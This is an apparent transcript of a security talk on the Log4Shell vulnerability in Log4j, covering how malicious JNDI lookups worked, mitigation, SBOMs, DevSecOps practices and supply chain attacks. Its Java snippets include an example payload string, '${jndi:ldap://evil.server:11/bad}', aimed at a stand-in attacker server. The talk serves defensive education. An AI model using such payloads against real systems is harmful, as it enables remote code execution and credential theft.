Transcript
Maple: My name is Simon Maple. I'm the Field CTO at Snyk. We're going to be looking at the impact that Log4Shell had on us as an ecosystem, and how we can better prepare ourselves for a future Log4Shell. I've been in Java commercially for 20-plus years, as a developer, in developer advocacy and community, and now as Field CTO at Snyk, a developer security company creating a platform to help developers add security into their workflows.
Outline
We're going to start by looking at the Log4Shell incident, the vulnerability that existed in the Log4j library. We're going to extract from that the bigger problems that can impact us in future in a similar way to Log4Shell. In fact, as I am recording this, we're literally a day into another potential Log4Shell-type incident, being called Spring4Shell, or Spring Shell, which looks like another remote code execution issue, potentially in the Spring ecosystem. These are the types of incidents that we are looking to better prepare ourselves for in future. Once we've talked about the steps we can take to mitigate that, we're going to look at what lies beyond the Log4Shell risk, beyond that open source risk: the steps we as Java developers and Java organizations can take to understand where that risk is, and what we can do to better prepare ourselves and mitigate those risks as we go.
What Is Log4Shell?
Let's jump in, first of all, with what the Log4Shell incident was, and some of the bigger problems that we can understand and take away as future learnings. This blog post is one that Brian Vermeer wrote for us on December 10th, the day that the vulnerability came out. Of course, it had to be a Friday: Friday morning or afternoon, when the Java ecosystem was alerted en masse to a new critical Log4j vulnerability. This was a remote code execution vulnerability. At the time, the suggested upgrade was to version 2.15. This was the version that at the time was thought to contain the entire fix for this incident. The CVSS score, which is essentially built from a scorecard of security questions to determine what the risk is and how easy it is to exploit, was a 10. That's out of 10, so the highest possible score.
Java Naming and Directory Interface (JNDI)
Let's dig a little bit deeper into what is actually happening under the covers and how this vulnerability came about. It really starts with a couple of things: first, the JNDI, and second, Java serialization. The JNDI, the Java Naming and Directory Interface, is essentially a service that is there by default in the JDK. It allows applications running on the JDK to access, potentially locally, like we've done here, a number of objects that have been registered into that JNDI. I'm sure there are many Java devs that are very familiar with this already; it's been a core part of the JDK for many years. As an example, you might make a request with a particular string that is effectively the key of an object that has been registered in the JNDI, for example, env/myDS, my data source. You might qualify that with java:comp, which is similar to a namespace, so java:comp/env/myDS. What we get back is the myDS Java object, which we can then use to get data from a database.
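As a rough illustration, a local JNDI lookup of a data source looks something like the following. This is a minimal sketch; the "java:comp/env/myDS" name is just the example used above, and it assumes a container has registered a data source under that key.

```java
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.sql.DataSource;

// Minimal sketch of a local JNDI lookup, using the env/myDS example above.
// The name "java:comp/env/myDS" assumes a data source has been registered
// under that key by the container; adjust it to whatever your environment uses.
public class LocalJndiLookup {
    public static void main(String[] args) throws Exception {
        Context ctx = new InitialContext();
        DataSource myDS = (DataSource) ctx.lookup("java:comp/env/myDS");
        // The returned object can now be used to get data from the database.
        System.out.println("Looked up data source: " + myDS);
    }
}
```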
We don’t always have to look to the local JNDI to register or get these objects. What we can also do is make a request out to a remote JNDI. In this case, here’s an example of what might happen if I was to create a remote evil JNDI, which I was to stand up on one of my evil servers. My application that I’ve deployed into the JDK can make a request out specifying, in this case, the JNDI LDAP server, parsing in an evil.server URL with a port here of 11, and requesting a bad object. What I would get back is a serialized object, bad, that I could reconstruct, and I could potentially execute there. Obviously, my application isn’t going to go out and request this bad object from my evil server. What an attacker would try and do to any attack vector here for this type of attack, is to parse in something to the application, so that the application will use that input that I give it to request something of my evil JNDI server?
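Purely to illustrate the mechanics (not something to run against anything real): the remote case uses the same lookup API, just with a URL pointing at the attacker's server. The evil.server host, port 11, and the bad object name are the hypothetical values from the example above.

```java
import javax.naming.Context;
import javax.naming.InitialContext;

// Illustration only: the same lookup API, but pointed at a remote,
// attacker-controlled LDAP server. "evil.server:11" and "bad" are the
// hypothetical names used in the example above.
public class RemoteJndiLookup {
    public static void main(String[] args) throws Exception {
        Context ctx = new InitialContext();
        // The server responds with an object reference that the JVM may
        // reconstruct and execute, which is where the danger lies.
        Object bad = ctx.lookup("ldap://evil.server:11/bad");
        System.out.println("Received object: " + bad);
    }
}
```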
That's all very well and good, but what does this have to do with Log4j? We know Log4j is a logging library. What's that got to do with the JNDI? Many years ago, I think it was around 2013, a feature was added into Log4j to be able to look up certain strings, properties, variables, and configurations from the JNDI. The trouble is, if the logger sees a string which is a JNDI-like lookup string, it will automatically try to perform that lookup as part of logging that request. As a result, there is a potential to exploit something like this by getting the application to log a user input which is a JNDI string containing my URL, which will pull my evil object and potentially run it. Typically, logging very often happens on exception paths and error paths. What we see here is attackers trying to drive the application down an exception path with a payload of the JNDI string. That JNDI string will relate to my evil object, which in this case is going to perform an exec, maybe passing some sensitive data back to my URL so I can extract credentials and other things. This is one example of what could happen.
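Here is a sketch of the vulnerable pattern, with a hypothetical payload. On an affected Log4j 2.x version (before the 2.15/2.16 fixes), logging attacker-controlled input like this is enough to trigger the remote lookup; the method and payload below are illustrative, not taken from any real application.

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Sketch of the vulnerable pattern on an affected Log4j 2.x version.
// In a real attack the payload arrives as user input (a header, a form
// field, a username) and ends up being logged, often on an error path.
public class VulnerableLogging {
    private static final Logger logger = LogManager.getLogger(VulnerableLogging.class);

    public static void handleLogin(String username) {
        // If username is "${jndi:ldap://evil.server:11/bad}", a vulnerable
        // Log4j version resolves that lookup while formatting this message.
        logger.error("Failed login attempt for user: {}", username);
    }
}
```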
One of the big problems with this specific vulnerability, and what made it rock the Java ecosystem so much, is the prevalence of Log4j, not just in the applications that we write, but in the third party libraries that we pull in, because of course, everyone needs logging, everyone uses some logging framework. The question is, if we're not using it directly, how do we know that something we rely on isn't using it? That's one of the biggest problems.
What Is the Industry Exposure?
At Snyk, we noticed a number of things from the customers that use us and are scanning with us: over a third of our customers are using Log4j. We scan a number of different ecosystems. The vast majority of our customers' Java applications had Log4j in them, but 35% of overall customers had Log4j. Interestingly, 60%, almost two-thirds, of those are using it as a transitive dependency. They're not using it directly in their applications, but the libraries, the open source third-party packages that they are using, are making use of Log4j. That makes it extremely hard to work out whether you have Log4j in your application or not. Because if you ask any developer, are you using Log4j? They'll most likely know if they're interacting directly with Log4j. However, do they know that three levels deep there is a library that they probably don't even know they're using that uses Log4j? Possibly not. The industry exposure as a result is very broad, because Log4j gets pulled in, in so many different places.
The Fix
What was the fix? If we look back at what the original or suggested fixes were, it's important to note that this changed very rapidly as more information came in, and that is because this was a zero-day vulnerability. The exploit was effectively widely known before the vulnerability was even disclosed. As a result, everyone was chasing their tails in terms of trying to understand the severity, the risk, and how things could be attacked. There were changing mitigation strategies and changing advice, depending literally on the hour of the day. Here's a cheat sheet that I wrote back in December, suggesting a number of different ways that it could be fixed.
The important thing to note is the fix was made available very soon. The strongest mitigation here was to upgrade Log4j, at the time to version 2.15. Of course, in some cases that wasn't possible, and we needed to ask, what are the next steps then? The vast majority of people actually had a bigger problem before they could even say, let me just upgrade my Log4j. The biggest problem people had here was visibility: gaining visibility of all the libraries that they are using in production, all the libraries that their application is pulling in. There are a couple of ways of doing that. Of course, there are tools that can do a lot of that on your behalf. If you're using something like Maven or Gradle, there are ways of pulling that data from your builds. However, it's hard to do that from the build process up, because essentially you need to make sure this is being done everywhere. It's sometimes easier to look at it from the top-down, and actually scan large repositories of your applications, so that you get a good understanding from the top-down of what is in your environments, what is in your Git repositories, for example.
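For example, on a single Maven or Gradle project you can ask the build tool directly whether Log4j appears anywhere in the dependency graph; something along these lines (exact output and configuration names will vary by project):

```shell
# Maven: show only Log4j entries in the dependency tree
mvn dependency:tree -Dincludes=org.apache.logging.log4j

# Gradle: trace where log4j-core comes from on the runtime classpath
./gradlew dependencyInsight --dependency log4j-core --configuration runtimeClasspath
```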
Obviously, the strongest path here is to upgrade. I believe we're on 2.17 or later these days in terms of the suggested fixes. However, what about those of you who are using binaries, rather than pulling Log4j in through your source? I think GitHub Enterprise, for example, was using Log4j. What do you do in a case where you don't have access to the source to perform an upgrade? In some cases, there were certain classes that you could just remove from the Log4j JAR before restarting the application. When you remove those classes, the vulnerable methods, the vulnerable functions, have effectively been removed, and it becomes impossible to go down those code paths. There are, of course, operational problems with that, because if you go down that route you might get unexpected behavior. Luckily, in this case, because people were either doing JNDI lookups on purpose or not at all, it was a little bit more predictable; it wasn't core functionality.
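The class in question was JndiLookup. The widely circulated mitigation for cases where an upgrade wasn't immediately possible was to strip it out of the log4j-core JAR and restart, along these lines:

```shell
# Remove the JndiLookup class from the log4j-core JAR (then restart the application)
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
```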
There were some other things that could be done. Some of these were later discovered to be less effective than others. Upgrading the JDK is a good example: a lot of people initially said yes, that's what you need to do straight away. However, after a little while it was discovered that it wasn't that effective, because attackers were mutating the way they approached the attack and circumventing some of the mitigations we were trying to put in place. That really points to the problem with relying purely on the runtime point of view, on things like egress traffic and WAFs: these are very short-lived fixes, because the way an attacker attacks your environment changes literally by the minute, by the day. As you block something in your WAF, your Web Application Firewall, which is essentially trying to block inbound traffic that has certain characteristics, an attacker will just say, "You've blocked that, I'll find another way around it." There's always an edge case that attackers will find to circumvent those kinds of defenses.
The last thing was really monitoring the projects and monitoring your environments. With these kinds of incidents, all eyes go to these projects to try to understand whether the fix was correct, and whether there are other ways you can achieve remote code execution in those projects. There were a number of further fixes that had to be rolled out as a result of this Log4Shell incident, and the risk varied at different times. It was very important to monitor the library so that as new vulnerabilities and CVEs were released, you were getting notified. Of course, there's an amount of tooling that Snyk and others can provide to do this, but this was typically the remediation that was available. If you're looking to still do these remediations, be sure to check online for the latest and greatest, to make sure the version changes include the latest movements from these libraries.
Log4j Timeline
Looking at the timeline, what can we learn from this? Obviously, we know that it was a zero-day. If you look at when the code that introduced the vulnerability first came in, as I mentioned, it was 2013, almost nine years before. It wasn't until late November 2021 that an Alibaba security researcher approached Apache with the disclosure, and a fix was worked on with Apache. The problem is, when you actually roll out a fix, when you put a fix into an open source project, people can look at it and ask, why are you making these code changes? They can see what you're essentially defending against. That can partly disclose the vulnerability to the ecosystem, because before others can start adopting that latest fix, you're essentially showing where the attack vector can be exploited. This happened on December 9th, and straightaway a PoC was published on GitHub. It was leaked on Twitter as well. We know how this goes; it snowballs. December 10th was the officially disclosed CVE. Although this was leaked on Twitter and GitHub the day before, the CVE hadn't even been published. From this stage, if you look day by day, the poor Log4j maintainers were working day and night on understanding where further issues could be found and fixed. That's an interesting timeline there.
On December 10th, the Friday afternoon, I'm sure everyone was probably in the incident room getting a team together. The first question, which is very often the hardest question, is: are we using Log4j? Where are we using it? How close is it to my critical systems? Are we exploitable? Those are the most common questions. Could you answer them? Were you able to answer them straightaway? The people who could were very often in ownership of an SBOM, a software bill of materials. A software bill of materials is an inventory, essentially, that itemizes all the components, all the ingredients, as it were, that you are using to construct your applications and put them into your production environments. It will list all the third party libraries, all the third party components that you're building in. What this allows you to do is identify, in this case: are we using log4j-core, for example, and which version? Are we using a vulnerable version of Log4j? Are we using Log4j at all anywhere? What projects are we using it in? Where in the dependency graph are we using it? Is it a direct dependency? Is it somewhere down the line? Is it fixable? These were the questions that, if we had this software bill of materials, we could answer extremely quickly.
Competing Standards
There are actually standards for an SBOM, a software bill of materials. There are two competing standards right now, and we're likely to keep both in our industry. One is CycloneDX, one is SPDX. Essentially, they're just different formats. One is under OWASP, the other under the Linux Foundation. CycloneDX is a little bit more developer focused, in the sense that you'll see tooling being created more for the open source world, where people can start testing and getting hands-on quicker. The SPDX project is more standards based, and a lot of the folks from standards backgrounds tend to resonate more with that angle. Both are reasonable standards, and we're likely to see various tools supporting both. These are the formats you can expect your SBOMs to exist in. How can you create an SBOM? Of course, there are many tools out there, Snyk and others. There are plenty of tools whereby you can scan all of your repositories. They'll take a look at your pom.xml files and your Gradle build files, create dependency graphs, and effectively give you this software bill of materials, where you can identify, list, and catalog the open source libraries that you're using.
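To make that concrete, here is a minimal, hand-written sketch of what a single Log4j entry looks like in a CycloneDX JSON SBOM; the version number shown is just a placeholder:

```json
{
  "bomFormat": "CycloneDX",
  "specVersion": "1.4",
  "components": [
    {
      "type": "library",
      "group": "org.apache.logging.log4j",
      "name": "log4j-core",
      "version": "2.14.1",
      "purl": "pkg:maven/org.apache.logging.log4j/log4j-core@2.14.1"
    }
  ]
}
```

With something like this in hand, answering "are we using a vulnerable version of log4j-core, and where?" becomes a simple query over your SBOMs rather than an emergency archaeology exercise.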
How to Prepare Better for the Next Log4Shell Style Incident
How can we better prepare ourselves for the next Log4Shell style incident, whether that's Spring4Shell right now or something else? What can we do ourselves? There are three things, and if you take DevSecOps as a good movement here, the three core pieces of DevSecOps are people, process, and tooling. These are the core things we need to look at in order to improve our posture around security. People is the most important, so let's start with people.
The Goal: Ownership Change
Within our organizations, DevOps has changed the way that we deliver software. I remember 20 years ago when I was working with two year release cycles; people weren't pushing to production anywhere near as fast as they are today, which tends to be daily. As a result, the more periodic, traditional security audit style was more appropriate back then compared to today. When we're delivering and deploying to production multiple times a day in more of a CI/CD DevOps way, we need to recognize that every change that goes to production needs to be scanned in the same way as we would for quality, with unit tests or integration tests and things like that. There are two things that need to happen there. First of all, you tend to see 100 devs, 10 DevOps folks, and 1 security person. That one security person can't be there to audit every change, to provide information about what to fix on every single change. As a result, we need an ownership change here. Shift left is good, but it's maybe more suited to a waterfall style; it's very much an efficiency play, doing something earlier. What we need here is an ownership change, where we move away from a dictatorial, top-to-bottom model of security providing for the developer, and toward empowering everyone who's making those changes. There are a number of things that need to alter, not just our outlook here, but our processes and the tools we choose. The core thing here is the responsibility that we as developers have in this new type of model.
Developer vs. Auditor Context
While we're on responsibility, let's take a look at the difference in context in terms of how we each look at things. A developer cares about the app; that's their context. They want to get the app working. They want to get the app shipped. They care about various aspects of the app, not just security, whereas an auditor purely cares about risk. They care about what vulnerabilities exist here. What is the risk? What is my exposure in my environment? You zoom out, and the developer cares about availability, resilience, a huge number of things way beyond security. Whereas the auditor cares about: where's my data? What other services are we depending on? How are they secured? They look at the overall risk that exists beyond the app. We have very different perspectives and points of view. As a result, we need to think about things differently. Auditors, or security folks, audit. What they care about is doing scans, running tests, creating tickets. Creating tickets is their resolution. For developers, when we want to empower them in security, their end goal is to fix. They need to resolve issues. They need solutions that they can actually push through, rather than just creating tickets. As a result, our mentality and the changes we need to make need to reflect this model.
Where Could Log4Shell Have Been Identified?
Let's take a look at Log4j now, and think about where we identified this issue. Where could this exposure have been identified? We couldn't really do anything in our pipeline here, because we weren't introducing Log4Shell there; we were already in production. This is a zero-day, something that is affecting us today, and we need to react to it as fast as we can. Of course, there are other ways, which we will cover, but at its core, this one needed to be handled on the right-hand side, in production.
Assess Libraries You Adopt
There are other things we can do to address other issues. For example, what if we were on the left-hand side, and we're introducing a library which potentially has a known vulnerability, or we just want to assess the risk? How much can we trust that library? There are things that we can do when we're introducing libraries to avoid that potential Log4j style zero-day going forward. This is a guide; there are obviously anomalies that can exist, Spring being one of them, which today potentially has this Spring4Shell issue. When you're using a library, it's important for your developers to ask these questions as they introduce it. Assess these libraries when you're using them. Don't just pull them in because they have the functionality that lets you push this use case through.
Check maintenance. How active is the maintenance here? Look at the commits over the last year: is it an abandoned project? Is it something whereby, if an issue were found, it would be resolved pretty quickly? How many issues are there? How many pull requests are currently open? What is the speed at which they're being resolved? How long ago was the last release? And if there is a new release of a transitive dependency that this library depends on, how long will this library take to perform a release consuming that latest version? The maintenance is very important to consider.
Then, of course, the popularity. There are a number of reasons why this is very useful. Popularity is an important signal, so make sure you're not the only person using this library, and that it is in fact well trusted by the ecosystem, something which lots of people rely on. This reliance on a library will very often drive things like the demand for maintenance and so forth.
Thirdly, security: look at the most popular version of this library that people are using, and, across the version ranges, where security issues are being introduced. How fast are they being resolved, both in your direct dependency for that library and in the transitives as well? If a transitive has a vulnerability, how soon is that being resolved? Then, finally, the community. How active is the community? How many contributors are there? If there are just one or two contributors, does that add a risk that this library could be abandoned, and so forth? With all of these metrics, what we want to pull together is essentially a health score. In this case, this is an npm package called Passport. This is a free advisor service on the Snyk website, and we provide a score out of 100 to give you almost a trust metric, or at least a health metric, of how reliable this library might be in your environment. You can run this across your dependency graph and identify where the weak points are.
Rethink Process
When we think about other places, the Log4Shell thing happened when we were in production already. Could we have taken steps to identify libraries that are more prone to these kinds of things? We could have done that while we were coding, before we added them in. Of course, anomalies are going to happen. Log4j is one of those very popular libraries where, even if you go through those kinds of processes, sometimes the thing is just going to happen. You might think an issue in Log4j itself is less likely, but when a risk does materialize there, the magnitude of the impact it can have on the ecosystem is far greater.
Of course, the other area we can look at is known vulnerabilities. A known vulnerability is essentially a vulnerability which has an entry in the CVE list or other vulnerability databases. That entry basically says: this is the vulnerability, this is how severe it is, this is the library it's in, with a version range from where it was introduced to just before it was fixed, and this is where it exists in your environment. It's very important to be able to automate those kinds of checks, to see, when you create your dependency graph, whether libraries that have vulnerabilities in them are being introduced into your applications through your builds. This can be done at various stages. You can automate it in your Git repository, so that as you create pull requests, you can automatically test whether the delta change is introducing new issues. That might be license issues or security vulnerabilities. This is a great way of improving your secure development by looking at your future development first, rather than staring at a potentially big backlog.
You can of course test in your CI/CD as well: run tests in your Jenkins builds. There's the opportunity here to block the build and make sure that if we get a very critical, high severity vulnerability, we just don't push it through. Very often, though, that can cause friction with a slick, fast-moving build process. You want to judge where you want to be more aggressive, and where you want to be less aggressive and instead be there for visibility, raising tickets, potentially with an SLA to fix within a certain number of days. The core thing is: run automation at these various points and provide that awareness and feedback to your developers as early as their IDE, with integrations and things like that.
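As a rough sketch of what such a gate might look like in a Jenkins declarative pipeline, assuming the Snyk CLI is installed on the build agent (any SCA tool with a CLI slots in the same way):

```groovy
// Illustrative Jenkinsfile stage: fail the build only on high-severity,
// upgradable issues, so the pipeline stays fast for everything else.
stage('Dependency scan') {
    steps {
        sh 'snyk test --severity-threshold=high --fail-on=upgradable'
    }
}
```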
Rethinking Tooling
One of the core things we mentioned previously was developer tooling: giving your development teams tools that address what their needs for security are. That is, to fix, not just to find like an auditor. Here are some of the things you need to think about when trying to work out what tooling your development teams should have. Make sure there's a self-service model to use those tools. Make sure there's plenty of documentation, created by your teams as well as by the vendor. A rich API, a command line interface, and the number of integrations are core as well, as is having a big open source community behind it. From a platform scope, there are many security acronyms, DAST, SAST, IAST, which tend to look more at your code, but think about the broader application that you're delivering as a cloud native application security concern. Finally, the one piece I want to stress here is the governance approach. When you're looking at a tool, ask the question: is this tool empowering me and my developers, or is it dictating to my developers? That will help you determine whether this is a tool that fits your DevOps process, or whether it doesn't fit the process or the model you're striving for.
Cloud Moves IT Stack into App
Finally, we're going to talk about what's beyond the Log4Shell risk in our applications; this is beyond open source libraries. When we think about how we as developers used to write code many years ago, certainly when I started 20 years ago, pre-cloud, we thought about the open source libraries that we consumed and the application code that we developed. That constituted the application, which we then threw over the wall to an operations team that looked after the platform, the operations piece, the production environment. Today, in a cloud environment, so much of that is now under the control and governance of regular application development. The Dockerfiles, the infrastructure as code, whether it's Terraform scripts or Kubernetes config, these are the typical things that we as developers are touching on a day-to-day basis. As a result, we need more of an AppSec solution that makes sure the things we change, the things we touch, are being done in a secure manner. A lot of the time, all of these things exist in our Git repositories, and as a result they're going through the development workflows. What we need to do is make sure we have solutions in place that test these in that development workflow, in our IDEs, in our GitHub repositories, and so forth.
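For instance, this is the kind of configuration that now lives next to the application code and deserves the same scrutiny; a minimal, hypothetical Kubernetes container spec fragment with the hardening settings that IaC scanners typically check for (the image name is a placeholder):

```yaml
# Hypothetical Kubernetes container spec fragment, checked into the app repo.
# IaC scanning in the IDE or on pull requests can flag missing settings like these.
spec:
  containers:
    - name: app
      image: registry.example.com/my-app:1.0.0   # placeholder image
      securityContext:
        runAsNonRoot: true
        allowPrivilegeEscalation: false
        readOnlyRootFilesystem: true
```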
Rethinking Priorities
Traditionally, when we as developers think about what we are securing, we go straight to our own code. While that is an important thing to test, both statically and dynamically, it's important to look at what's beneath the waterline of that iceberg: the open source code, as well as your infrastructure as code and the misconfigurations there. Think about where you are most likely to be breached. Is it an open source library, is it your own code, or is it an S3 bucket with a misconfiguration? Is it a container that contains vulnerabilities in its open source packages? Look at this as a whole, and try to identify where your most critical issues are based on the stack that you are using.
Supply Chain Security: A Novel Application Risk
One of the last things I want to cover is something called the supply chain. Maybe you've heard a lot about supply chain security and supply chain risk more recently. When I started in my development days, we had very much internal build systems; we had build engineers running builds literally on our own data centers. Much more of that is now done by third party software, potentially by SaaS software as well. It's a much more complex pipeline that we've built up over the last couple of decades, and there's a lot of trust we need to put in many of the different components in that pipeline. We need to understand what's in that pipeline, but also where the weak links are in our supply chain, as well as in that pipeline, to identify where we are most vulnerable.
Let's take a look at where the security risks potentially are as part of our pipeline. First of all, we have the pipeline we deliver through: we as developers check code into Git, push to a build pipeline, store artifacts perhaps in an artifact repository, before pushing to a consumer, maybe into our production environment, or potentially into another supply chain. The thing we've mentioned most here is third party libraries. There are two pieces here: one is the risk that we add into our application from our supply chain; the second is a potential supply chain attack. The two are quite different. The second one is about a compromise of our dependency.
Do you think Log4j, Log4Shell, was a supply chain attack? Think about who the attacker is. Who is trying to perform the attack, and what are they trying to attack, trying to break, trying to compromise? It's typically some attacker out there who is trying to break your application that contains Log4j. They're attacking your application; they're not attacking your supply chain. Log4j is providing you with supply chain risk, but it's not a supply chain attack. An attack on your supply chain is where the attacker is intentionally trying to compromise a library, or your container, for example, and other things that we'll talk about. The attacker is breaking your supply chain; they're not trying to attack your application or your endpoints. The actual attack vector gets introduced in your supply chain, not in something you've put into production.
Containers are very similar, with vulnerabilities or compromises that can come in through your container images as well, particularly public container images. A second type is a compromise of the pipeline, a compromise of developer code: someone trying to attack your Git repository, someone trying to break into your build through misconfigurations in your build environments, unauthorized access into your pipeline. Then the third piece of a supply chain attack is the compromise of a pipeline dependency. Codecov was one example; SolarWinds was another, with the build tools there. In the Codecov case, the CI plugin was compromised, and the compromised, malicious version of that plugin was added into other people's pipelines, attacking those pipelines, taking credentials, taking environment variables, and sending them off to evil servers. This is what a supply chain attack really looks like.
These are potentially very lucrative to exploit, because if you look at Codecov, that was a cascading supply chain attack. The actual attack happened on the Codecov supply chain, which was then used in other supply chains, so it cascades to huge numbers of pipelines, giving out huge numbers of credentials. This is where we need to be thinking beyond the open source libraries. Cascading effects are some of the biggest attacks that can happen.
Conclusion
Hopefully, that gives you a good insight into actionable tips that you can take away, and also into the areas of risk that you can look at, because while today it's Log4Shell or Spring4Shell, tomorrow there could be another attack vector. We need to think very holistically about the overall application that we're deploying, about where the greatest risk is in our processes and our teams, and about where our tooling can really help us out.